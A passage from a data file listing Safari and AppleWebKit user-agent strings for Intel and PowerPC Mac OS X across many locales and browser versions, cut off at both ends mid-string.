10_5_4; en-gb) AppleWebKit/528.4+ (KHTML, like Gecko) Version/4.0dp1 Safari/526.11.2\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/528.4+ (KHTML, like Gecko) Version/4.0dp1 Safari/526.11.2\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_5; en-us) AppleWebKit/525.25 (KHTML, like Gecko) Version/3.2 Safari/525.25\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_5; it-it) AppleWebKit/525.18 (KHTML, like Gecko)\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_5; ja-jp) AppleWebKit/525.26.2 (KHTML, like Gecko) Version/3.2 Safari/525.26.12\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_5; sv-se) AppleWebKit/525.26.2 (KHTML, like Gecko) Version/3.2 Safari/525.26.12\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-gb) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-gb) AppleWebKit/528.10+ (KHTML, like Gecko) Version/4.0dp1 Safari/526.11.2\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.1 Safari/525.20\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.1 Safari/525.13\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko)\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.4+ (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/528.7+ (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/530.6+ (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; fr-fr) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; hr-hr) AppleWebKit/530.1+ (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; it-it) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; it-it) AppleWebKit/528.8+ (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; ko-kr) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; nb-no) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; ru-ru) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; zh-tw) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; de-de) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.20\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; de-de) AppleWebKit/525.28.3 (KHTML, like Gecko) Version/3.2.3 Safari/525.28.3\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.1 Safari/530.18\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/531.2+ (KHTML, like Gecko) Version/4.0.1 Safari/530.18\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.3 Safari/531.21.10\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; fi-fi) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; it-it) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; ja-jp) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; nl-nl) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; zh-cn) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; zh-tw) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; nl-nl) AppleWebKit/532.3+ (KHTML, like Gecko) Version/4.0.3 Safari/531.9\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; de-at) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; ja-jp) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; nb-no) AppleWebKit/533.16 (KHTML, like Gecko) Version/4.1 Safari/533.16\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; ru-ru) AppleWebKit/533.2+ (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; ca-es) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; de-de) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; el-gr) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-au) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.21.11 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/533.4+ (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/534.1+ (KHTML, like Gecko) Version/5.0 Safari/533.16\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; es-es) AppleWebKit/531.22.7 (KHTML, like Gecko)\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; HTC-P715a; en-ca) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; it-it) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; ja-jp) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; ko-kr) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; ru-ru) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; zh-cn) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; th-th) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.1 Safari/533.17.8\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; ar) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; de-de) AppleWebKit/534.15+ (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; de-de) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-gb) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-us) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; es-es) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; fr-ch) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; fr-fr) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; it-it) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; ja-jp) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; ko-kr) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; sv-se) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; zh-cn) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_7; da-dk) AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-us) AppleWebKit/534.16+ (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_7; ja-jp) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; de-at) AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_7; en-us) AppleWebKit/533.4 (KHTML, like Gecko) Version/4.1 Safari/533.4\nMozilla/5.0 (Macintosh; U; Intel Mac OS X; de-de) AppleWebKit/522.11.1 (KHTML, like Gecko) Version/3.0.3 Safari/522.12.1\nMozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/521.32.1 (KHTML, like Gecko) Safari/521.32.1\nMozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/522.11.1 (KHTML, like Gecko) Safari/419.3\nMozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/522.11.1 (KHTML, like Gecko) Version/3.0.3 Safari/522.12.1\nMozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/522.11 (KHTML, like Gecko) Version/3.0.2 Safari/522.12\nMozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/522+ (KHTML, like Gecko) Version/3.0.2 Safari/522.12\nMozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/523.2+ (KHTML, like Gecko) Version/3.0.3 Safari/522.12.1\nMozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/523.5+ (KHTML, like Gecko) Version/3.0.3 Safari/522.12.1\nMozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/523.9+ (KHTML, like Gecko) Version/3.0.3 Safari/522.12.1\nMozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit (KHTML, like Gecko)\nMozilla/5.0 (Macintosh; U; Intel Mac OS X; en-us) AppleWebKit/419.2.1 (KHTML, like Gecko) Safari/419.3\nMozilla/5.0 (Macintosh; U; Intel Mac OS X; en-us) AppleWebKit/522.11.1 (KHTML, like Gecko) Version/3.0.3 Safari/522.12.1\nMozilla/5.0 (Macintosh; U; Intel Mac OS X; en-us) AppleWebKit/525.1+ (KHTML, like Gecko) Version/3.0.4 Safari/523.10\nMozilla/5.0 (Macintosh; U; Intel Mac OS X; es-es) AppleWebKit/523.15.1 (KHTML, like Gecko) Version/3.0.4 Safari/523.15\nMozilla/5.0 (Macintosh; U; Intel Mac OS X; fr) AppleWebKit/523.12.2 (KHTML, like Gecko) Version/3.0.4 Safari/523.12.2\nMozilla/5.0 (Macintosh; U; Intel Mac OS X; fr-fr) AppleWebKit/523.10.3 (KHTML, like Gecko) Version/3.0.4 Safari/523.10\nMozilla/5.0 (Macintosh; U; Intel Mac OS X; fr-fr) AppleWebKit/525.1+ (KHTML, like Gecko) Version/3.0.4 Safari/523.10\nMozilla/5.0 (Macintosh; U; Intel Mac OS X; it-IT) AppleWebKit/521.25 (KHTML, like Gecko) Safari/521.24\nMozilla/5.0 (Macintosh; U; Intel Mac OS X; it-it) AppleWebKit/523.10.6 (KHTML, like Gecko) Version/3.0.4 Safari/523.10.6\nMozilla/5.0 (Macintosh; U; Intel Mac OS X; it-it) AppleWebKit/523.12.2 (KHTML, like Gecko) Version/3.0.4 Safari/523.12.2\nMozilla/5.0 (Macintosh; U; Intel Mac OS X; ja-jp) AppleWebKit/523.10.3 (KHTML, like Gecko) Version/3.0.4 Safari/523.10\nMozilla/5.0 (Macintosh; U; Intel Mac OS X; ja-jp) AppleWebKit/523.12.2 (KHTML, like Gecko) Version/3.0.4 Safari/523.12.2\nMozilla/5.0 (Macintosh; U; Intel Mac OS X; ko-kr) AppleWebKit/523.15.1 (KHTML, like Gecko) Version/3.0.4 Safari/523.15\nMozilla/5.0 (Macintosh; U; Intel Mac OS X; ru-ru) AppleWebKit/522.11.1 (KHTML, like Gecko) Version/3.0.3 Safari/522.12.1\nMozilla/5.0 (Macintosh; U; Intel Mac OS X; sv-se) AppleWebKit/523.10.3 (KHTML, like Gecko) Version/3.0.4 Safari/523.10\nMozilla/5.0 (Macintosh; U; Intel Mac OS X; sv-se) AppleWebKit/523.10.6 (KHTML, like Gecko) Version/3.0.4 Safari/523.10.6\nMozilla/5.0 (Macintosh; U; Intel Mac OS X; sv-se) AppleWebKit/523.12.2 (KHTML, like Gecko) Version/3.0.4 Safari/523.12.2\nMozilla/5.0 (Macintosh; U; Intel Mac OS X; zh-tw) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13.3\nMozilla/5.0 (Macintosh; U; PPC Mac OS; en-en) AppleWebKit/412 (KHTML, like Gecko) Safari/412\nMozilla/5.0 (Macintosh; U; PPC Mac OS; pl-pl) AppleWebKit/412 (KHTML, like Gecko) Safari/412\nMozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; da-dk) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7\nMozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; de) AppleWebKit/528.4+ (KHTML, like Gecko) Version/4.0dp1 Safari/526.11.2\nMozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; de-de) AppleWebKit/533.16 (KHTML, like Gecko) Version/4.1 Safari/533.16\nMozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.18\nMozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/525.3+ (KHTML, like Gecko) Version/3.0.4 Safari/523.12.2\nMozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/528.4+ (KHTML, like Gecko) Version/4.0dp1 Safari/526.11.2\nMozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; es-es) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1\nMozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; fr) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.22\nMozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; fr) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16\nMozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; fr-fr) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1\nMozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; hu-hu) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10\nMozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; it-it) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1\nMozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; ja-jp) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.18\nMozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; ja-jp) AppleWebKit/533.16 (KHTML, like Gecko) Version/4.1 Safari/533.16\nMozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; nl-nl) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13\nMozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; nl-nl) AppleWebKit/533.16 (KHTML, like Gecko) Version/4.1 Safari/533.16\nMozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; pl-pl) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1\nMozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; sv-se) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.22\nMozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; sv-se) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1\nMozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; tr) AppleWebKit/528.4+ (KHTML, like Gecko) Version/4.0dp1 Safari/526.11.2\nMozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_2; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.18\nMozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_2; en-gb) AppleWebKit/526+ (KHTML, like Gecko) Version/3.1 Safari/525.9\nMozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_3; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.20\nMozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_3; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.20\nMozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_3; sv-se) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.20\nMozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.0.4 Safari/523.10\nMozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1 Safari/525.13\nMozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_4; fr-fr) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1\nMozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_5; en-us) AppleWebKit/525.26.2 (KHTML, like Gecko) Version/3.2 Safari/525.26.12\nMozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_5; fi-fi) AppleWebKit/525.26.2 (KHTML, like Gecko) Version/3.2 Safari/525.26.12\nMozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_5; fr-fr) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1\nMozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_6; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1\nMozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko)\nMozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_6; en-us) AppleWebKit/530.1+ (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1\nMozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_6; fr-fr) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1\nMozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_6; nl-nl) AppleWebKit/530.0+ (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1\nMozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_7; en-us) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19\nMozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_8; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7\nMozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_8; en-us) AppleWebKit/532.0+ (KHTML, like Gecko) Version/4.0.3 Safari/531.9\nMozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_8; en-us) AppleWebKit/532.0+ (KHTML, like Gecko) Version/4.0.3 Safari/531.9.2009\nMozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_8; ja-jp) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/3.2.3 Safari/525.28.3\nMozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_8; ja-jp) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16\nMozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_8; ja-jp) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1\nMozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_8; ja-jp) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27\nMozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_8; zh-cn) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27\nMozilla/5.0 (Macintosh; U; PPC Mac OS X 10.5; en-US; rv:1.9.1b3pre) Gecko/20081212 Mozilla/5.0 (Windows; U; Windows NT 5.1; en) AppleWebKit/526.9 (KHTML, like Gecko) Version/4.0dp1 Safari/526.8\nMozilla/5.0 (Macintosh; U; PPC Mac OS X 10_6_1; en_GB, en_US) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; ca-es) AppleWebKit/522.11.1 (KHTML, like Gecko) Version/3.0.3 Safari/522.12.1\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; da-dk) AppleWebKit/522+ (KHTML, like Gecko) Safari/419.3\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; de-ch) AppleWebKit/312.1 (KHTML, like Gecko) Safari/312\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; de-CH) AppleWebKit/419.2 (KHTML, like Gecko) Safari/419.3\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; de-ch) AppleWebKit/85 (KHTML, like Gecko) Safari/85\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/124 (KHTML, like Gecko) Safari/125\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/124 (KHTML, like Gecko) Safari/125.1\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/125.2 (KHTML, like Gecko) Safari/125.7\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/125.2 (KHTML, like Gecko) Safari/125.8\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/125.4 (KHTML, like Gecko) Safari/125.9\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/125.5.5 (KHTML, like Gecko) Safari/125.12\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/125.5.5 (KHTML, like Gecko) Safari/125.12_Adobe\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/125.5.6 (KHTML, like Gecko) Safari/125.12\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/125.5.6 (KHTML, like Gecko) Safari/125.12_Adobe\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/125.5.7 (KHTML, like Gecko) Safari/125.12\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/312.1.1 (KHTML, like Gecko) Safari/312\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/312.1 (KHTML, like Gecko) Safari/312\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/312.1 (KHTML, like Gecko) Safari/312.3.1\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/312.5.2 (KHTML, like Gecko) Safari/312.3.3\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/312.8.1 (KHTML, like Gecko) Safari/312.6\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/312.8 (KHTML, like Gecko) Safari/312.5\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/312.8 (KHTML, like Gecko) Safari/312.5_Adobe\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/412.6.2 (KHTML, like Gecko) Safari/412.2.2\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/412.6 (KHTML, like Gecko)\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/412.6 (KHTML, like Gecko) Safari/412.2\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/412.6 (KHTML, like Gecko) Safari/412.2_Adobe\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/412.7 (KHTML, like Gecko) Safari/412.5\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/412.7 (KHTML, like Gecko) Safari/412.5_Adobe\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/412 (KHTML, like Gecko) Safari/412\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/416.12 (KHTML, like Gecko) Safari/416.13\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/416.12 (KHTML, like Gecko) Safari/416.13_Adobe\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418.9.1 (KHTML, like Gecko) Safari/419.3\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/419.2 (KHTML, like Gecko) Safari/419.3\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/522.11 (KHTML, like Gecko) Version/3.0.2 Safari/522.12\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/85.7 (KHTML, like Gecko) Safari/85.5\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/85.7 (KHTML, like Gecko) Safari/85.7\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/85.8.2 (KHTML, like Gecko) Safari/85.8\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/85.8.5 (KHTML, like Gecko) Safari/85\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/85.8.5 (KHTML, like Gecko) Safari/85.8.1\nMozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/124 (KHTML, like Gecko)\nMozilla/5.0 